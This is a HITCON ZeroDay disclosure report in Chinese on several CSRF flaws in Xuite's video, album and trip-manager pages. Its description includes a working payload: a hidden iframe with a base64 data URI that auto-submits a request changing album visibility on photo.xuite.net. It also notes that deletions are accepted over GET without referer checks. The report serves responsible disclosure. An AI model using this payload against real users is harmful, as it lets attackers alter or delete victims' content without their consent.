多處隨意窩CSRF漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00280
  • Vendor: 隨意窩
  • Title: 多處隨意窩CSRF漏洞
  • Introduction: 多處CSRF漏洞

處理狀態

目前狀態

公開
Last Update : 2017/01/03
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2016/11/01 20:00:42 : 新提交 (由 catding 更新此狀態)
  • 2016/11/01 20:00:48 : 新提交 (由 HITCON ZeroDay 平台自動更新)
  • 2016/11/02 13:47:07 : 審核完成 (由 HITCON ZeroDay 平台自動更新)
  • 2016/11/02 17:10:35 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/11/02 17:10:35 : 通報未回應 (由 HITCON ZeroDay 平台自動更新)
  • 2017/01/01 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2017/01/03 01:00:15 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)

詳細資料

  • ZDID:ZD-2016-00280
  • 通報者:catding (catding)
  • 風險:高
  • 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)

參考資料

攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。

漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

影音 http://vlog.xuite.net/_my2
相簿 http://photo.xuite.net/_my2/
管理行程 http://yo.xuite.net/_my2/trip_manager.php

敘述

影音、相簿管理請求,接受空的referer

所以用
<iframe width="1" height="1" src="data:text/html;base64,PGZvcm0gbWV0aG9kPWdldCBhY3Rpb249aHR0cDovL3Bob3RvLnh1aXRlLm5ldC9fbXkyL2FsYnVtL2FqYXg+PGlucHV0IHR5cGU9dGV4dCBuYW1lPWFjdCB2YWx1ZT0ndXBkYXRlQWxidW0nPjxpbnB1dCB0eXBlPXRleHQgbmFtZT1hbGJ1bV9pZCB2YWx1ZT0xOTk0NjY2MT48aW5wdXQgdHlwZT10ZXh0IG5hbWU9dHlwZSB2YWx1ZT0ndmlzaWJpbGl0eSc+PGlucHV0IHR5cGU9dGV4dCBuYW1lPXZpc2liaWxpdHkgdmFsdWU9JzEnPjwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0Pg=="></iframe>
之類的方式就可以發送請求
觸發各種操作(如刪除、更改開放權限)

管理行程的刪除功能使用GET傳值
且未驗證referer

建議站方全面檢查後臺管理請求的驗證方式

擷圖

留言討論

;